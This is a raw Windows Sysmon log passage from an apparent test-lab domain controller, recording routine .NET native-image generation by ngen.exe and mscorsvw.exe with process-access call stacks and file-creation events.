13:50:19.290{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921B-6005-E403-00000000A301}3808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:19.197{59A5CD1D-921A-6005-E303-00000000A301}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1320-0\PresentationBuildTasks.dll2021-01-18 13:50:19.197 10341000x80000000000000008183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-EF03-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.759{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-EF03-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.759{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-EF03-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.681{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-EE03-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.681{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-EE03-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.681{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-EE03-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:20.618{59A5CD1D-921C-6005-ED03-00000000A301}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\2ec-0\PresentationFramework-SystemXmlLinq.dll2021-01-18 13:50:20.618 10341000x80000000000000008176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.572{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-ED03-00000000A301}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.556{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-ED03-00000000A301}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.556{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-ED03-00000000A301}748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.509{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-EC03-00000000A301}2116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.509{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-EC03-00000000A301}2116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.509{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-EC03-00000000A301}2116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:20.447{59A5CD1D-921C-6005-EB03-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9e4-0\PresentationFramework-SystemXml.dll2021-01-18 13:50:20.447 10341000x80000000000000008169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.368{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-EB03-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.368{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-EB03-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.368{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-EB03-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.306{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-EA03-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.290{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-EA03-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.290{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-EA03-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:20.243{59A5CD1D-921C-6005-E903-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e6c-0\PresentationFramework-SystemDrawing.dll2021-01-18 13:50:20.243 10341000x80000000000000008162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.103{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-E903-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.087{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-E903-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:20.087{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-E903-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscors